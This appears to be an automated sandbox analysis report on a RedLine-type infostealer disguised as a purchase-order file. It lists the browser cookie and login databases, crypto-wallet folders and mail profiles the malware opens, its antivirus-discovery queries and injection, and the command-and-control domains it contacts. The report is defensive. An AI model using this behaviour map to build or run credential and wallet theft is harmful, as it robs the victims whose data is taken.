                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeQueries volume information: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeQueries volume information: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                            Source: C:\Windows\System32\AppVClient.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\FXSSVC.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\FXSSVC.exeQueries volume information: C:\ProgramData\Microsoft\Windows NT\MSFax\Queue\TSTEB13.tmp VolumeInformation
                            Source: C:\Windows\System32\FXSSVC.exeQueries volume information: C:\ProgramData\Microsoft\Windows NT\MSFax\TSTEB14.tmp VolumeInformation
                            Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\msdtc.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeQueries volume information: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                            Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\Locator.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\SensorDataService.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\snmptrap.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\Spectrum.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\OpenSSH\ssh-agent.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\TieringEngineService.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\AgentService.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\vds.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\wbengine.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\TieringEngineService.exeKey value queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\TimeZoneInformation Bias
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 0_2_004223BC GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_004223BC
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 0_2_004711D2 GetUserNameW,0_2_004711D2
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 0_2_0040E470 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_0040E470
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\build.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                            Source: C:\Users\user\AppData\Local\Temp\build.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                            Source: C:\Users\user\AppData\Local\Temp\build.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                            Source: C:\Users\user\AppData\Local\Temp\build.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                            Source: C:\Users\user\AppData\Local\Temp\build.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                            Source: C:\Users\user\AppData\Local\Temp\build.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

                            Stealing of Sensitive Information

Source: Yara match | File source: 5.3.microsofts.exe.590000.1148.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.3.microsofts.exe.6e3718.17.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.svchost.exe.6000000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.svchost.exe.6000000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.3.microsofts.exe.590000.1051.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.3.microsofts.exe.5b0000.1147.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.3.microsofts.exe.590000.913.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.3.microsofts.exe.5b0000.1146.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.3.microsofts.exe.6e3718.17.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.0.Native_Redline_BTC.exe.10000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000006.00000000.2117556197.0000000000012000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.2424106953.0000000007240000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.2119948725.00000000006E3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.2419729495.0000000007240000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2128865412.0000000006000000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe, type: DROPPED
Source: Yara match | File source: dump.pcap, type: PCAP
Source: Yara match | File source: 6.2.Native_Redline_BTC.exe.12354d08.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.Native_Redline_BTC.exe.123eb188.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.Native_Redline_BTC.exe.123eb188.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.0.build.exe.bc0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.Native_Redline_BTC.exe.1239ff50.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.Native_Redline_BTC.exe.1239ff50.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.Native_Redline_BTC.exe.12354d08.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000006.00000002.2132146464.00000000123E2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.2132146464.0000000012309000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.2132146464.0000000012397000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000000.2126000556.0000000000BC2000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Native_Redline_BTC.exe PID: 6180, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: build.exe PID: 7064, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\build.exe, type: DROPPED
Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: ElectrumE#
Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: JaxxE#
Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: ExodusE#
Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: EthereumE#
Source: microsofts.exe, 00000005.00000003.2119948725.00000000006E3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: set_UseMachineKeyStore
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\user\AppData\Local\Temp\build.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\build.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Users\user\AppData\Local\Temp\build.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\build.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\build.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\build.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\build.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File opened: C:\FTP Navigator\Ftplist.txt
Source: C:\Users\user\AppData\Local\Temp\build.exe | File opened: C:\Users\user\AppData\Roaming\atomic\
Source: C:\Users\user\AppData\Local\Temp\build.exe | File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Users\user\AppData\Local\Temp\build.exe | File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\Cache\
Source: C:\Users\user\AppData\Local\Temp\build.exe | File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\db\
Source: C:\Users\user\AppData\Local\Temp\build.exe | File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Users\user\AppData\Local\Temp\build.exe | File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Users\user\AppData\Local\Temp\build.exe | File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\build.exe | File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\build.exe | File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
Source: C:\Users\user\AppData\Local\Temp\build.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\build.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\build.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Users\user\AppData\Local\Temp\build.exe | File opened: C:\Users\user\AppData\Roaming\Guarda\
Source: C:\Users\user\AppData\Local\Temp\build.exe | File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe, 00000003.00000000.2075282784.0000000000482000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 6, 0USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:cdeclwinapistdcallnonestrwstrintbooluintlongulongdwordshortushortwordbyteubytebooleanfloatdoubleptrhwndhandlelresultlparamwparamint64uint64int_ptruint_ptrlong_ptrulong_ptrdword_ptridispatch64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----
Source: PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | Binary or memory string: WIN_XP
Source: PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | Binary or memory string: WIN_XPe
Source: PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | Binary or memory string: WIN_VISTA
Source: PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | Binary or memory string: WIN_7
Source: Yara match | File source: 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: build.exe PID: 7064, type: MEMORYSTR

                            Remote Access Functionality

Source: Yara match | File source: 5.3.microsofts.exe.590000.1148.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.3.microsofts.exe.6e3718.17.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.svchost.exe.6000000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.svchost.exe.6000000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.3.microsofts.exe.590000.1051.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.3.microsofts.exe.5b0000.1147.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.3.microsofts.exe.590000.913.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.3.microsofts.exe.5b0000.1146.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.3.microsofts.exe.6e3718.17.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.0.Native_Redline_BTC.exe.10000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000006.00000000.2117556197.0000000000012000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.2424106953.0000000007240000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.2119948725.00000000006E3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.2419729495.0000000007240000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2128865412.0000000006000000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe, type: DROPPED
Source: Yara match | File source: dump.pcap, type: PCAP
Source: Yara match | File source: 6.2.Native_Redline_BTC.exe.12354d08.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.Native_Redline_BTC.exe.123eb188.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.Native_Redline_BTC.exe.123eb188.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.0.build.exe.bc0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.Native_Redline_BTC.exe.1239ff50.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.Native_Redline_BTC.exe.1239ff50.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.Native_Redline_BTC.exe.12354d08.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000006.00000002.2132146464.00000000123E2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.2132146464.0000000012309000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.2132146464.0000000012397000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000000.2126000556.0000000000BC2000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Native_Redline_BTC.exe PID: 6180, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: build.exe PID: 7064, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\build.exe, type: DROPPED
Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | Code function: 0_2_004741BB socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_004741BB
Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | Code function: 0_2_0046483C socket,WSAGetLastError,bind,WSAGetLastError,listen,WSAGetLastError,closesocket,0_2_0046483C
Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | Code function: 0_2_0047AD92 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,0_2_0047AD92
Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | Code function: 3_2_004741BB socket,WSAGetLastError,bind,WSAGetLastError,closesocket,3_2_004741BB
Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | Code function: 3_2_0046483C socket,WSAGetLastError,bind,WSAGetLastError,listen,WSAGetLastError,closesocket,3_2_0046483C
Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | Code function: 3_2_0047AD92 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,3_2_0047AD92
MITRE ATT&CK Matrix, listed per tactic column. Techniques the report matched keep the number prefix shown in the original matrix cell; the remaining entries are the unmatched techniques of that column.

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses; Network Security Appliances; Gather Victim Org Information

Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure; Domains; DNS Server

Initial Access: 2 Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise; Compromise Software Dependencies and Development Tools; Compromise Software Supply Chain

Execution: 331 Windows Management Instrumentation; 21 Native API; 2 Command and Scripting Interpreter; 1 Scheduled Task/Job; 2 Service Execution; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell; AppleScript; Windows Command Shell

Persistence: 2 LSASS Driver; 1 DLL Side-Loading; 2 Valid Accounts; 1 Windows Service; 1 Scheduled Task/Job; 2 Registry Run Keys / Startup Folder; Startup Items; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task

Privilege Escalation: 1 Exploitation for Privilege Escalation; 1 Abuse Elevation Control Mechanism; 2 LSASS Driver; 1 DLL Side-Loading; 2 Valid Accounts; 21 Access Token Manipulation; 1 Windows Service; 212 Process Injection; 1 Scheduled Task/Job; 2 Registry Run Keys / Startup Folder; Launchd; Scheduled Task

Defense Evasion: 111 Disable or Modify Tools; 11 Deobfuscate/Decode Files or Information; 1 Abuse Elevation Control Mechanism; 4 Obfuscated Files or Information; 12 Software Packing; 1 Timestomp; 1 DLL Side-Loading; 322 Masquerading; 2 Valid Accounts; 351 Virtualization/Sandbox Evasion; 21 Access Token Manipulation; 212 Process Injection

Credential Access: 2 OS Credential Dumping; 121 Input Capture; 1 Credentials in Registry; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing; Input Capture; Keylogging

Discovery: 11 System Time Discovery; 1 Account Discovery; 3 File and Directory Discovery; 238 System Information Discovery; 1 Query Registry; 641 Security Software Discovery; 351 Virtualization/Sandbox Evasion; 3 Process Discovery; 11 Application Window Discovery; 1 System Owner/User Discovery; 1 System Network Configuration Discovery; Process Discovery

Lateral Movement: 1 Taint Shared Content; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot; Software Deployment Tools; Taint Shared Content

Collection: 11 Archive Collected Data; 4 Data from Local System; 1 Email Collection; 121 Input Capture; 4 Clipboard Data; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging; Remote Data Staging; Screen Capture

Command and Control: 4 Ingress Tool Transfer; 11 Encrypted Channel; 1 Non-Standard Port; 4 Non-Application Layer Protocol; 125 Application Layer Protocol; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols; Mail Protocols; DNS

Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted Non-C2 Protocol; Exfiltration Over Physical Medium

Impact: 1 System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement; Firmware Corruption; Resource Hijacking

                            Legend:

                            • Process
                            • Signature
                            • Created File
                            • DNS/IP Info
                            • Is Dropped
                            • Is Windows Process
                            • Number of created Registry Values
                            • Number of created Files
                            • Visual Basic
                            • Delphi
                            • Java
                            • .Net C# or VB.NET
                            • C, C++ or other language
                            • Is malicious
                            • Internet
Behavior Graph ID: 1530636
Sample: PO-NBQ73652_ORDER_T637MOO74...
Start date: 10/10/2024
Architecture: WINDOWS
Score: 100

Sample-level DNS/IP: zyiexezl.biz; zlenh.biz; 78 other IPs or domains
Sample-level signatures: Multi AV Scanner detection for domain / URL; Suricata IDS alerts for network traffic; Found malware configuration; 13 other signatures

Process tree (numbers after a process name are the created-registry-value / created-file counts from the graph; "started" edges are children, "dropped" edges are written files):

PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe 1
    signatures: Switches to a custom stack to bypass stack traces; Contains functionality to detect sleep reduction / modifications
    started: PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe
        signatures: Writes to foreign memory regions; Maps a DLL or memory area into another process
        started: svchost.exe 4
            dropped: C:\Users\user\AppData\...\microsofts.exe (PE32); C:\Users\user\...\Native_Redline_BTC.exe (PE32); C:\Program Files (x86)\...\armsvc.exe (PE32)
            signatures: Drops executable to a common third party application directory; Infects executable files (exe, dll, sys, html)
            started: microsofts.exe 15 2
                DNS/IP: banwyw.biz 44.221.84.105, ports 49711, 49716, 49954, AMAZON-AESUS, United States; acwjcqqv.biz 18.141.10.107, ports 49707, 49710, 49717, AMAZON-02US, United States; 7 other IPs or domains
